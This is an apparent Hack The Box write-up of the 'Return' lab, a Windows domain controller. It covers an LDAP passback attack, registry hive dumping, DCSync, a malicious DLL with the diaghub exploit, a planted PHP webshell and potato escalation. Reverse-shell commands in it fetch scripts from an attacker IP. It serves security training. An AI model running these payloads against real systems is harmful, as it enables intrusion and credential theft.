# Return - HTB

[[_TOC_]]

## Summary

<!-- markdownlint-disable MD033 -->
<div align="center"><img src="images/0.png"></div>

Return was a pleasant, easy-rated HTB Windows machine created by [MrR3boot](https://app.hackthebox.com/users/13531)

The user involved LDAP passback attack.  
There were multiple ways to get root: `SeBackupPrivilege`, `SeRestorePrivilege`, `SeLoadDriverPrivilege`, or by using Server Operators group.

## Initial recon

```console
opcode@parrot$ nmap -v -p- --min-rate 2000 10.10.11.108
Nmap scan report for 10.10.11.108
Host is up (0.092s latency).
Not shown: 65510 closed tcp ports (reset)
PORT      STATE SERVICE
53/tcp    open  domain
80/tcp    open  http
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
5985/tcp  open  wsman
9389/tcp  open  adws
47001/tcp open  winrm
49664/tcp open  unknown
49665/tcp open  unknown
49666/tcp open  unknown
49667/tcp open  unknown
49671/tcp open  unknown
49676/tcp open  unknown
49677/tcp open  unknown
49681/tcp open  unknown
49684/tcp open  unknown
49696/tcp open  unknown
```

```console
opcode@parrot$ nmap -sC -sV -p 53,80,88,135,139,389,445,464,593,636,3268,3269,5985,9389,49664,49665,49666,49667,49671,49676,49677,49681,49684,49696 -oN return.nmap 10.10.11.108
Nmap scan report for 10.10.11.108
Host is up (0.089s latency).

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: HTB Printer Admin Panel
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2023-11-01 07:50:34Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: return.local0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: return.local0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp  open  mc-nmf        .NET Message Framing
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49671/tcp open  msrpc         Microsoft Windows RPC
49676/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49677/tcp open  msrpc         Microsoft Windows RPC
49681/tcp open  msrpc         Microsoft Windows RPC
49684/tcp open  msrpc         Microsoft Windows RPC
49696/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: PRINTER; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2023-11-01T07:51:27
|_  start_date: N/A
| smb2-security-mode: 
|   311: 
|_    Message signing enabled and required
|_clock-skew: 18m35s
```

Several ports are open, including DNS, Kerberos, SMB, RPC, LDAP, and WinRM. It's likely a DC.

We can start with LDAP enumeration:

```console
opcode@parrot$ ldapsearch -x -H ldap://10.10.11.108 -s base -b "" -LLL
dn:
domainFunctionality: 7
forestFunctionality: 7
domainControllerFunctionality: 7
rootDomainNamingContext: DC=return,DC=local
ldapServiceName: return.local:printer$@RETURN.LOCAL
isGlobalCatalogReady: TRUE
supportedSASLMechanisms: GSSAPI
supportedSASLMechanisms: GSS-SPNEGO
supportedSASLMechanisms: EXTERNAL
supportedSASLMechanisms: DIGEST-MD5
supportedLDAPVersion: 3
supportedLDAPVersion: 2
[--SNIP--]
subschemaSubentry: CN=Aggregate,CN=Schema,CN=Configuration,DC=return,DC=local
serverName: CN=PRINTER,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=return,DC=local
schemaNamingContext: CN=Schema,CN=Configuration,DC=return,DC=local
namingContexts: DC=return,DC=local
namingContexts: CN=Configuration,DC=return,DC=local
namingContexts: CN=Schema,CN=Configuration,DC=return,DC=local
namingContexts: DC=DomainDnsZones,DC=return,DC=local
namingContexts: DC=ForestDnsZones,DC=return,DC=local
isSynchronized: TRUE
highestCommittedUSN: 102472
dsServiceName: CN=NTDS Settings,CN=PRINTER,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=return,DC=local
dnsHostName: printer.return.local
defaultNamingContext: DC=return,DC=local
currentTime: 20231101075047.0Z
configurationNamingContext: CN=Configuration,DC=return,DC=local
```

We have the FQDN `printer.return.local` here; we can add it to `/etc/hosts`:

```text
10.10.11.108 printer.return.local return.local printer
```

## SMB enumeration

We can enumerate SMB shares. [CrackMapExec](https://github.com/mpgn/CrackMapExec) is my tool of choice these days:

```console
opcode@parrot$ docker run -it --entrypoint=/bin/bash --rm --name cmexec cme:latest
root@28b58e1cc68d:~# echo '10.10.11.108 printer.return.local return.local printer' >> /etc/hosts
```

Testing for null session:

```console
root@28b58e1cc68d:~# cme smb 10.10.11.108 -d return.local -u '' -p '' --shares
SMB         10.10.11.108    445    PRINTER          [*] Windows 10.0 Build 17763 x64 (name:PRINTER) (domain:return.local) (signing:True) (SMBv1:False)
SMB         10.10.11.108    445    PRINTER          [+] return.local\: 
SMB         10.10.11.108    445    PRINTER          [-] Error enumerating shares: STATUS_ACCESS_DENIED
```

Null sessions are disabled.

Testing for guest session:

```console
root@28b58e1cc68d:~# cme smb 10.10.11.108 -d return.local -u 'opcode' -p '' --shares
SMB         10.10.11.108    445    PRINTER          [*] Windows 10.0 Build 17763 x64 (name:PRINTER) (domain:return.local) (signing:True) (SMBv1:False)
SMB         10.10.11.108    445    PRINTER          [-] return.local\opcode: STATUS_LOGON_FAILURE 
```

Guest sessions are disabled as well.

I also ran [enum4linux-ng](https://github.com/cddmp/enum4linux-ng) for RPC enumeration but found nothing.

## LDAP Passback Attack

On <http://10.10.11.108/settings.php>, it allows us to update some printer settings, or so I thought.  
It has a form with 4 fields: `Server Address`, `Server Port`, `Username`, and `Password` and an `Update` button.  
It is more complex than using the form to reset the password, though.  
I started [Responder](https://github.com/lgandx/Responder) in my terminal first:

```console
opcode@parrot$ sudo ./Responder.py -I tun0 -Pv
```

Then I changed `Server Address` to my `tun0` IP and pressed update, leaving all other fields the same.

In `Responder`, cleartext credentials were captured:

```log
[LDAP] Attempting to parse an old simple Bind request.
[LDAP] Cleartext Client   : 10.10.11.108
[LDAP] Cleartext Username : return\svc-printer
[LDAP] Cleartext Password : 1edFg43012!!
```

## Post-credential enumeration

Now that we have a set of credentials, we can enumerate more.  
Starting with SMB shares:

```console
root@28b58e1cc68d:~# cme smb 10.10.11.108 -d return.local -u 'svc-printer' -p '1edFg43012!!' --shares
SMB         10.10.11.108    445    PRINTER          [*] Windows 10.0 Build 17763 x64 (name:PRINTER) (domain:return.local) (signing:True) (SMBv1:False)
SMB         10.10.11.108    445    PRINTER          [+] return.local\svc-printer:1edFg43012!! 
SMB         10.10.11.108    445    PRINTER          [*] Enumerated shares
SMB         10.10.11.108    445    PRINTER          Share           Permissions     Remark
SMB         10.10.11.108    445    PRINTER          -----           -----------     ------
SMB         10.10.11.108    445    PRINTER          ADMIN$          READ            Remote Admin
SMB         10.10.11.108    445    PRINTER          C$              READ,WRITE      Default share
SMB         10.10.11.108    445    PRINTER          IPC$            READ            Remote IPC
SMB         10.10.11.108    445    PRINTER          NETLOGON        READ            Logon server share 
SMB         10.10.11.108    445    PRINTER          SYSVOL          READ            Logon server share 
```

Read and write to `C$` appears dangerous, but `STATUS_ACCESS_DENIED` comes up whenever I try to access something more privileged.  
WinRM is next:

```console
root@28b58e1cc68d:~# cme winrm 10.10.11.108 -d return.local -u 'svc-printer' -p '1edFg43012!!'
HTTP        10.10.11.108    5985   PRINTER          [*] http://10.10.11.108:5985/wsman
HTTP        10.10.11.108    5985   PRINTER          [+] return.local\svc-printer:1edFg43012!! (Pwn3d!)
```

We can already get a shell via WinRM:

```console
root@dbb706de9e25:~# cme winrm 10.10.11.108 -d return.local -u 'svc-printer' -p '1edFg43012!!' -X 'IEX(IWR http://10.10.14.45:8000/Invoke-ConPtyShell.ps1 -UseBasicParsing); Invoke-ConPtyShell 10.10.14.45 9001'
```

## Post-shell AD enumeration

```console
PS C:\> whoami
return\svc-printer
PS C:\> whoami /all

USER INFORMATION
----------------

User Name          SID
================== =============================================
return\svc-printer S-1-5-21-3750359090-2939318659-876128439-1103


GROUP INFORMATION
-----------------

Group Name                                 Type             SID          Attributes
========================================== ================ ============ ================================================== 
Everyone                                   Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group 
BUILTIN\Server Operators                   Alias            S-1-5-32-549 Mandatory group, Enabled by default, Enabled group 
BUILTIN\Print Operators                    Alias            S-1-5-32-550 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users            Alias            S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                              Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                       Well-known group S-1-5-2      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization             Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication           Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level       Label            S-1-16-12288


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                         State
============================= =================================== =======
SeMachineAccountPrivilege     Add workstations to domain          Enabled
SeLoadDriverPrivilege         Load and unload device drivers      Enabled
SeSystemtimePrivilege         Change the system time              Enabled
SeBackupPrivilege             Back up files and directories       Enabled
SeRestorePrivilege            Restore files and directories       Enabled
SeShutdownPrivilege           Shut down the system                Enabled
SeChangeNotifyPrivilege       Bypass traverse checking            Enabled
SeRemoteShutdownPrivilege     Force shutdown from a remote system Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set      Enabled
SeTimeZonePrivilege           Change the time zone                Enabled


USER CLAIMS INFORMATION
-----------------------

User claims unknown.

Kerberos support for Dynamic Access Control on this device has been disabled.
```

`SeLoadDriverPrivilege`, `SeBackupPrivilege`, and `SeRestorePrivilege` are all dangerous privileges.

Placing `webshell.php` inside `\inetpub\webroot` did not work because we don't have the permissions:

```console
PS C:\> Get-Acl -Path C:\inetpub\wwwroot | Format-List 

Path   : Microsoft.PowerShell.Core\FileSystem::C:\inetpub\wwwroot 
Owner  : NT AUTHORITY\SYSTEM
Group  : NT AUTHORITY\SYSTEM
Access : NT AUTHORITY\LOCAL SERVICE Allow  FullControl
         NT AUTHORITY\LOCAL SERVICE Allow  268435456
         NT AUTHORITY\NETWORK SERVICE Allow  FullControl      
         NT AUTHORITY\NETWORK SERVICE Allow  268435456        
         BUILTIN\IIS_IUSRS Allow  ReadAndExecute, Synchronize 
         BUILTIN\IIS_IUSRS Allow  -1610612736
         NT SERVICE\TrustedInstaller Allow  FullControl       
         NT SERVICE\TrustedInstaller Allow  268435456
         NT AUTHORITY\SYSTEM Allow  FullControl
         NT AUTHORITY\SYSTEM Allow  268435456
         BUILTIN\Administrators Allow  FullControl
         BUILTIN\Administrators Allow  268435456
         BUILTIN\Users Allow  ReadAndExecute, Synchronize     
         BUILTIN\Users Allow  -1610612736
         CREATOR OWNER Allow  268435456
Audit  :
Sddl   : O:SYG:SYD:AI(A;;FA;;;LS)(A;OICIIO;GA;;;LS)(A;;FA;;;NS)(A;OICIIO;GA;;;NS)(A;;0x1200a9;;;IS)(A;OICIIO;GXGR;;;IS)(A;ID;FA;;;S-1-5-80-956008885-3418522649-1831038044-1853292631-2271478 
         464)(A;OICIIOID;GA;;;S-1-5-80-956008885-3418522649-1831038044-1853292631-2271478464)(A;ID;FA;;;SY)(A;OICIIOID;GA;;;SY)(A;ID;FA;;;BA)(A;OICIIOID;GA;;;BA)(A;ID;0x1200a9;;;BU)(A;OICII 
         OID;GXGR;;;BU)(A;OICIIOID;GA;;;CO)
```

## Approach 1: Privilege escalation with `SeBackupPrivilege`

If both `SeBackupPrivilege` and `SeRestorePrivilege` are available, we can transfer the flag with:

```console
PS C:\> robocopy /b C:\Users\Administrator\Desktop\ C:\Windows\Tasks\
PS C:\> type C:\Windows\Tasks\root.txt
a67192dfdc1b8e33adc54f06cb7df07d 
```

To abuse `SeBackupPrivilege` alone, we can dump `HKLM\SAM` and `HKLM\SYSTEM` registry hives.

```console
PS C:\> reg save HKLM\SAM SAM
The operation completed successfully.
PS C:\> reg save HKLM\SYSTEM SYSTEM
The operation completed successfully.
PS C:\> reg save HKLM\SECURITY SECURITY
ERROR: Access is denied.
```

We can download them via SMB and use `secretsdump.py` to extract local account hashes:

```console
opcode@parrot$ secretsdump.py -sam SAM -system SYSTEM LOCAL
Impacket v0.12.0.dev1+20231012.22017.2de29184 - Copyright 2023 Fortra

[*] Target system bootKey: 0xa42289f69adb35cd67d02cc84e69c314
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:34386a771aaca697f447754e4863d38a:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Cleaning up... 
```

But this is the local user Administrator's hash; it cannot be used on the domain controller.  
We also want to dump LSA secrets, and the SECURITY hive is needed for them.  
I came across [this tweet](https://twitter.com/filip_dragovic/status/1468857873446932483) from [Filip Dragovic](https://twitter.com/filip_dragovic):

![1](images/1.png)

> SAM and SYSTEM can be dump with `reg save` but when trying to dump SECURITY hive you get access denied.

I modified the `BackupOperators.cpp` to match the values from this box:

```cpp
#include <stdio.h>
#include <Windows.h>

void MakeToken() {
    HANDLE token;
    const char username[] = "svc-printer";
    const char password[] = "1edFg43012!!";
    const char domain[] = "return.local";

    if (LogonUserA(username, domain, password, LOGON32_LOGON_NEW_CREDENTIALS, LOGON32_PROVIDER_DEFAULT, &token) == 0) {
        printf("LogonUserA: %d\n", GetLastError());
        exit(0);
    }
    if (ImpersonateLoggedOnUser(token) == 0) {
        printf("ImpersonateLoggedOnUser: %d\n", GetLastError());
        exit(0);
    }
}

int main()
{
    HKEY hklm;
    HKEY hkey;
    DWORD result;
    const char* hives[] = { "SAM","SYSTEM","SECURITY" };
    const char* files[] = { "C:\\windows\\tasks\\sam.hive","C:\\windows\\tasks\\system.hive","C:\\windows\\tasks\\security.hive" };
    
    //Uncomment if using alternate credentials.
    //MakeToken();

    result = RegConnectRegistryA("\\\\PRINTER", HKEY_LOCAL_MACHINE,&hklm);
    if (result != 0) {
        printf("RegConnectRegistryW: %d\n", result);
        exit(0);
    }
    for (int i = 0; i < 3; i++) {

        printf("Dumping %s hive to %s\n", hives[i], files[i]);
        result = RegOpenKeyExA(hklm, hives[i], REG_OPTION_BACKUP_RESTORE | REG_OPTION_OPEN_LINK, KEY_READ, &hkey);
        if (result != 0) {
            printf("RegOpenKeyExA: %d\n", result);
            exit(0);
        }
        result = RegSaveKeyA(hkey, files[i], NULL);
        if (result != 0) {
            printf("RegSaveKeyA: %d\n", result);
            exit(0);
        }
    }
}
```

Create a new C++ Console App in Visual Studio.  
Replace the boilerplate code with the code from above, set the configuration to "x64 Release" and use <kbd>Ctrl</kbd>+<kbd>B</kbd> to build.

```console
PS C:\Windows\Tasks> iwr 10.10.14.45:8000/BackupOperators.exe -o BackupOperators.exe
PS C:\Windows\Tasks> .\BackupOperators.exe
Dumping SAM hive to C:\windows\tasks\sam.hive
Dumping SYSTEM hive to C:\windows\tasks\system.hive
Dumping SECURITY hive to C:\windows\tasks\security.hive
```

We can use `smbclient.py` to grab them:

```console
opcode@parrot$ smbclient.py return.local/svc-printer:'1edFg43012!!'@printer.return.local
Impacket v0.12.0.dev1+20231012.22017.2de29184 - Copyright 2023 Fortra

Type help for list of commands
# use c$
# cd Windows/tasks
# get sam.hive
# get security.hive
# get system.hive
```

`secretsdump.py` to extract local account hashes:

```console
opcode@parrot$ secretsdump.py -sam sam.hive -security security.hive -system system.hive LOCAL 
Impacket v0.12.0.dev1+20231012.22017.2de29184 - Copyright 2023 Fortra

[*] Target system bootKey: 0xa42289f69adb35cd67d02cc84e69c314
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:34386a771aaca697f447754e4863d38a:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
$MACHINE.ACC:plain_password_hex:586b4e7d17d003282cf71178a3b2294f64d84bc82e3a89a97787e7c7bae3e60ad0a83384589028941c280a3d466a374cd84caf129763d79175d6c1a672b15e712fdca282f1ef0989ca6e8af479640cfdf1cb1c2aeb1a7781273dc453522b46e93e60e4f5bb0a1647d5f31de37f5410c0e87cf9c1f2f7fd66cc4687512a43ec1f15089684d587a685b10ebb4696c1c0568f26e53a9971b71cc6246e0f071ac79f2ae78cf1aeeecd5d05b0782e542543a925df9a523cc3a23bb0c9962b0041cd415d3f26ff810b83ba83002417f514fd2aac6079889c90d4856850c6e5b89d1899a72d3f096ee3cea5af92e5492359bc04
$MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:ff2d359e80869f1413f43f5cb78335f4
[*] DPAPI_SYSTEM 
dpapi_machinekey:0x06243ead9780ed8b9e36d34624aca3eff9eff2a0
dpapi_userkey:0x3dba4981ae9cb884001d7b0b3ffa5d3504fc12b8
[*] NL$KM 
 0000   16 BD CA 34 21 A5 5C AD  51 ED B1 7E 4A 4F 59 B8   ...4!.\.Q..~JOY.
 0010   C3 65 1E 1A 5D 6D 97 82  79 3A 58 A0 FC 2B B5 8B   .e..]m..y:X..+..
 0020   A4 E2 9B CF DD 7B 52 80  99 33 45 4F F1 35 15 DC   .....{R..3EO.5..
 0030   4F 99 B3 A1 CB 55 21 A5  CC F5 27 43 F7 16 AA BC   O....U!...'C....
NL$KM:16bdca3421a55cad51edb17e4a4f59b8c3651e1a5d6d9782793a58a0fc2bb58ba4e29bcfdd7b52809933454ff13515dc4f99b3a1cb5521a5ccf52743f716aabc
[*] Cleaning up...
```

Now, the machine account can be used to perform DCsync:

```console
opcode@parrot$ secretsdump.py return.local/'PRINTER$'@printer.return.local -hashes :ff2d359e80869f1413f43f5cb78335f4
Impacket v0.12.0.dev1+20231012.22017.2de29184 - Copyright 2023 Fortra

[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:32db622ed9c00dd1039d8288b0407460:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:4e48ce125611add31a32cd79e529964b:::
return.local\svc-printer:1103:aad3b435b51404eeaad3b435b51404ee:c1d26bdcecf44246b5f8653284331a2e:::
PRINTER$:1000:aad3b435b51404eeaad3b435b51404ee:ff2d359e80869f1413f43f5cb78335f4:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:2f7d707eb859ec2c26109953831f54861a0ee47d3e4b16dde7f17009d08297b0
Administrator:aes128-cts-hmac-sha1-96:ef8673c4ba668752432c817dda62af48
Administrator:des-cbc-md5:4f0ee6291aabd338
krbtgt:aes256-cts-hmac-sha1-96:cc6ddaa28d2bb97926dabd1b82845479a97080aad93eddfd2ccf4f2ddf00961a
krbtgt:aes128-cts-hmac-sha1-96:cc5f4a49b6a0cdb71cdea34e84ba2a2e
krbtgt:des-cbc-md5:1086497c1fc1ab8a
return.local\svc-printer:aes256-cts-hmac-sha1-96:6dd6f85d0cf31eb1c01d7aff4e30a58bc5948e6f05e6d88f5cdb57be0208117d
return.local\svc-printer:aes128-cts-hmac-sha1-96:a92bc84131dcd4309431242e8ee9437e
return.local\svc-printer:des-cbc-md5:574cb9a8a8e5cb43
PRINTER$:aes256-cts-hmac-sha1-96:c4a4593985895aa0168805fd22503f7b987a49c12e215ecdb5afa93acd6995a9
PRINTER$:aes128-cts-hmac-sha1-96:6d55ea9b62bfc7ac60c405906ccbe760
PRINTER$:des-cbc-md5:8a1acb5b58ef23a4
[*] Cleaning up... 
```

The administrator's hash or kerberos keys can be used with `psexec.py` to get a shell:

```console
opcode@parrot$ psexec.py return.local/Administrator@printer.return.local -hashes :32db622ed9c00dd1039d8288b0407460
Impacket v0.12.0.dev1+20231012.22017.2de29184 - Copyright 2023 Fortra

[*] Requesting shares on printer.return.local.....
[*] Found writable share ADMIN$
[*] Uploading file tAqDMDFb.exe
[*] Opening SVCManager on printer.return.local.....
[*] Creating service BYux on printer.return.local.....
[*] Starting service BYux.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32> whoami
nt authority\system
```

## Approach 2: Privilege escalation with `SeRestorePrivilege`

To abuse `SeRestorePrivilege`, [daem0nc0re](https://twitter.com/daem0nc0re)'s tool [SeRestorePrivilegePoC](https://github.com/daem0nc0re/PrivFu/blob/main/PrivilegedOperations/SeRestorePrivilegePoC) can be used. I verified that it can write arbitrary data to arbitrary files.  
Now the question is how to abuse this for root.

I first wanted to try [Diaghub collector exploit](https://googleprojectzero.blogspot.com/2018/04/windows-exploitation-tricks-exploiting.html), but I learnt that it was patched, starting from Windows 10 build 18362 (version 1903)

```console
PS C:\> computerinfo 

WindowsBuildLabEx                                       : 17763.1.amd64fre.rs5_release.180914-1434 
WindowsCurrentVersion                                   : 6.3
WindowsEditionId                                        : ServerStandard
WindowsInstallationType                                 : Server
WindowsInstallDateFromRegistry                          : 5/20/2021 7:09:32 PM
WindowsProductId                                        : 00429-00521-62775-AA814
WindowsProductName                                      : Windows Server 2019 Standard
WindowsRegisteredOrganization                           :
WindowsRegisteredOwner                                  : Windows User
WindowsSystemRoot                                       : C:\Windows
WindowsVersion                                          : 1809
[--SNIP--]
```

I could not get the attached PoC to compile and had to use [xct](https://twitter.com/xct_de)'s PoC: <https://github.com/xct/diaghub>  
We can compile it with Visual Studio. As usual, open the solution, update `PlatformToolset` to `v143`, and set the configuration to "x64 Release".  
Open the solution explorer with <kbd>Ctrl</kbd>+<kbd>Alt</kbd>+<kbd>T</kbd>, select `diaghub` and use <kbd>Ctrl</kbd>+<kbd>B</kbd> to build.  
As for the malicious `dll`, I changed the `pwn` function in `dllmain.cpp` a bit:

```cpp
int pwn()
{
    WinExec("powershell.exe IEX(IWR http://10.10.14.45:8000/Invoke-ConPtyShell.ps1 -UseBasicParsing); Invoke-ConPtyShell 10.10.14.45 9001", 0);
    return 0;
}
```

Now we can select `xct` in solution explorer and use <kbd>Ctrl</kbd>+<kbd>B</kbd> to build.  
We can upload these two:

```console
PS C:\Windows\Tasks> iwr 10.10.14.45:8000/diaghub.exe -o diaghub.exe
PS C:\Windows\Tasks> iwr 10.10.14.45:8000/xct.dll -o xct.dll
```

We can use `rundll32` to verify that this `dll` works:

```console
PS C:\> rundll32 C:\Windows\Tasks\xct.dll,pwn
```

Next, I modified `SeRestorePrivilegePoC.cs`:

```diff
-            byte[] messageBytes = Encoding.UTF8.GetBytes("This file is created for testing SeRestorePrivilege.");
+            // byte[] messageBytes = Encoding.UTF8.GetBytes("This file is created for testing SeRestorePrivilege.");
+            byte[] messageBytes = File.ReadAllBytes("C:/Windows/Tasks/xct.dll");
```

and

```diff
-            string filePath = @"C:\Windows\System32\SeRestorePrivilegeTestFile.txt";
+            string filePath = @"C:\Windows\System32\xct.dll";
```

Again, open the solution, update `PlatformToolset` to `v143`, and set the configuration to "Release".  
Open the solution explorer with <kbd>Ctrl</kbd>+<kbd>Alt</kbd>+<kbd>T</kbd>, select `SeRestorePrivilegePoC`, and use <kbd>Ctrl</kbd>+<kbd>B</kbd> to build.  

```console
PS C:\Windows\Tasks> iwr 10.10.14.45:8000/SeRestorePrivilegePoC.exe -o SeRestorePrivilegePoC.exe
```

We can try writing `xct.dll` to `\Windows\System32`:

```console
PS C:\Windows\Tasks> .\SeRestorePrivilegePoC.exe
[*] If you have SeRestorePrivilege, you can write privileged files and registries in the system.
[*] This PoC tries to create file to C:\Windows\System32\xct.dll.
[+] C:\Windows\System32\xct.dll is created successfully.
```

I checked the integrity of created file:

```console
PS C:\Windows\Tasks> Get-FileHash -Algorithm MD5 -Path "C:\Windows\System32\xct.dll"

Algorithm       Hash
---------       ----
MD5             7659BE1586D842F36CAF4C6B6763E3B2

PS C:\Windows\Tasks> Get-FileHash -Algorithm MD5 -Path "C:\Windows\Tasks\xct.dll"

Algorithm       Hash
---------       ----
MD5             7659BE1586D842F36CAF4C6B6763E3B2
```

Seems good. The final push:

```console
PS C:\Windows\Tasks> .\diaghub.exe C:\Windows\Tasks xct.dll
[+] CoCreateInstance
[+] CoQueryProxyBlanket
[+] CoSetProxyBlanket
[+] CreateSession
[+] CoCreateGuid
[+] Success
```

I got a shell as system:

```console
PS C:\Windows\system32> whoami
nt authority\system
```

Alternate EoP with privileged file write exploits:

- [UsoDllLoader](https://github.com/itm4n/UsoDllLoader)
- [WerTrigger](https://github.com/sailay1996/WerTrigger)

## Approach 3: `SeRestorePrivilege` to write PHP webshell in webroot

I also wanted to try writing a webshell to webroot:

```diff
-            byte[] messageBytes = Encoding.UTF8.GetBytes("This file is created for testing SeRestorePrivilege.");
+            byte[] messageBytes = Encoding.UTF8.GetBytes("<?php system($_SERVER['HTTP_USER_AGENT'])?>.");
```

and

```diff
-            string filePath = @"C:\Windows\System32\SeRestorePrivilegeTestFile.txt";
+            string filePath = @"C:\inetpub\wwwroot\webshell.php";
```

```console
PS C:\Windows\Tasks> .\SeRestorePrivilegePoC.exe
[*] If you have SeRestorePrivilege, you can write privileged files and registries in the system.
[*] This PoC tries to create file to C:\inetpub\wwwroot\webshell.php.
[+] C:\inetpub\wwwroot\webshell.php is created successfully.
```

Now, we can get shell as `nt authority\iusr`:

```console
opcode@parrot$ curl http://10.10.11.108/webshell.php -A 'whoami'
nt authority\iusr
opcode@parrot$ curl http://10.10.11.108/webshell.php -A 'whoami /priv'

PRIVILEGES INFORMATION
----------------------

Privilege Name          Description                               State  
======================= ========================================= =======
SeChangeNotifyPrivilege Bypass traverse checking                  Enabled
SeImpersonatePrivilege  Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects                     Enabled
```

We can use a potato to abuse `SeImpersonatePrivilege`  
First, get a shell:

```console
opcode@parrot$ curl http://10.10.11.108/webshell.php -A 'powershell.exe IEX(IWR http://10.10.14.45:8000/Invoke-ConPtyShell.ps1 -UseBasicParsing); Invoke-ConPtyShell 10.10.14.45 9001'
```

It did not work. I had to rely on [Nishang's PowerShell TCP Reverse Shell](https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcpOneLine.ps1):

```console
opcode@parrot$ curl http://10.10.11.108/webshell.php -A 'powershell.exe IEX(IWR http://10.10.14.45:8000/Invoke-PowerShellTcpOneLine.ps1 -UseBasicParsing)'
```

We can do the usual potato magic now:

```console
PS C:\windows\tasks> iwr 10.10.14.45:8000/JuicyPotatoNG.exe -o JuicyPotatoNG.exe
PS C:\Windows\Tasks> .\JuicyPotatoNG.exe -t * -p "cmd.exe" -a "/c powershell.exe IEX(IWR http://10.10.14.45:8000/Invoke-ConPtyShell.ps1 -UseBasicParsing); Invoke-ConPtyShell 10.10.14.45 9001"
```

It sends us a shell as system:

```console
PS C:\Windows\system32> whoami
nt authority\system
```

I had also tried using [FullPowers.exe](https://github.com/itm4n/FullPowers) to get back `SeImpersonatePrivilege` on `svc-printer`. The binary did not work.

## Approach 4: Privilege escalation with `SeLoadDriverPrivilege` (Failed)

`SeLoadDriverPrivilege` allows the user to load kernel drivers. We can abuse it by loading a vulnerable driver.
In this one, I'd use [Capcom.sys](https://github.com/FuzzySecurity/Capcom-Rootkit/blob/master/Driver/Capcom.sys)

But first, we need to compile [EoPLoadDriver](https://github.com/TarlogicSecurity/EoPLoadDriver). It would enable `SeLoadDriverPrivilege` if disabled and load the vulnerable driver.  
Create a new C++ Console App in Visual Studio. Replace the boilerplate code with the code from repo, set the configuration to "x64 Release" and use <kbd>Ctrl</kbd>+<kbd>B</kbd> to build. (I had to remove the line `#include "stdafx.h"` for some reason). Once built, transfer the binary and execute:

```console
PS C:\Windows\Tasks> iwr 10.10.14.45:8000/EoPLoadDriver.exe -o EoPLoadDriver.exe
PS C:\Windows\Tasks> iwr 10.10.14.45:8000/Capcom.sys -o Capcom.sys
